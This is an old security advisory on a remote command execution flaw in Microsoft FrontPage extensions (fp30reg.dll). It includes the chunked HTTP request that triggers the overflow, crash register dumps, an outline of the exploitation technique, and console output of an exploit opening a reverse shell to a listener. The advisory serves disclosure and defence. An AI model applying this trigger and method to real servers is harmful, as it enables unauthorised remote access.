<<< Date Index >>>     <<< Thread Index >>>

Frontpage Extensions Remote Command Execution



========================================================================
= Frontpage Extensions Remote Command Execution
=
= MS Bulletin posted: 
= http ://www.microsoft.com/technet/security/bulletin/ms03-051.asp
=
= Affected Software:
=       Microsoft Windows 2000 Service Pack 2, Service Pack 3 
=       Microsoft Windows XP, Microsoft Windows XP Service Pack 1 
=       Microsoft Office XP, Microsoft Office XP Service Release 1 
=
= Public disclosure on November 11, 2003
========================================================================

Continuing 'The Methodical Approach To Finding Overflows' we moved to
the next attack avenue. After the success against nsiislog.dll we were
again greeted by an access violation message leading to the discovery
of another remote vulnerability.

== Description ==

Sending a chunked encoded post to fp30reg.dll will cause an access
violation resulting in the following error log.

------------------------------------------------------------------------
Event Type:     Warning
Event Source:   W3SVC
Event Category: None
Event ID:       37
Description:
Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly. 
------------------------------------------------------------------------

A chunked encoded post will result in the control of ECX and EDI, with
the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading
to remote command execution with privileges associated with the
IWAM_machinename account.

== Chunked Transfer-Encoding Post ==

POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Transfer-Encoding: chunked

PostLength
PostData
0


== Exploitation ==

[Code Segment]
 67D46AD3 mov ecx,dword ptr [ebx+edx+8]
 67D46AD7 mov edi,dword ptr [ebx+edx+4]
 67D46ADB mov dword ptr [ecx+4],edi

[Registers]
 EAX = 046F83E8 EBX = 00000010 ECX = 58585858           
 EDX = 05450FEC ESI = 0000000C EDI = 58585858           
 EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668

[EDX DUMP]
 05450FEC  11 00 00 00 58 58 58  ....XXX
 05450FF3  58 58 58 58 58 58 58  XXXXXXX
 05450FFA  58 58 58 58 58 58 58  XXXXXXX
 05451001  58 58 58 58 58 58 58  XXXXXXX
 05451008  58 58 58 58 58 58 58  XXXXXXX
 0545100F  58 58 58 58 58 58 58  XXXXXXX
 05451016  58 58 58 58 58 58 58  XXXXXXX

Many different ways to exploit this malloc/free scenario, so instead of
the usual SEH redirect to a JMP instruction, we took a two step approach
for higher reliability.

At the first exception error we are in control of ECX and EDI allowing
us to write our JMP instruction to a known writeable space. This does
not cause an exception and execution flow continues through to a CALL
instruction that uses a value from our buffer. We use this CALL to
reach our JMP instruction.

== Exploit Example ==

%:\>exploit 192.168.1.63

** FP30REG.DLL - Ver 4.0.2.5526 - Remote Shell **

. Calling Home: blackhole:2000
. Using: 0x---------h as writeable data space 
. Shellcode Size: 304 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To 192.168.1.63
. Sending Exploit......Exploit Sent
. Connection Received

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>

== Solutions ==

- Every day is a 0-day day on the Internet. Limiting the avenues of attack
  can be a key factor in reducing the risk to a web server. Programs such
  as secureIIS and URLscan should be setup to reduce the number of methods
  that can be used to send data to a server. Removing unnecessary services,
  files and isapi extensions reduces the number of listeners that data can
  be fed to limiting the number of vulnerabilities that a server is
  susceptible to.
- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.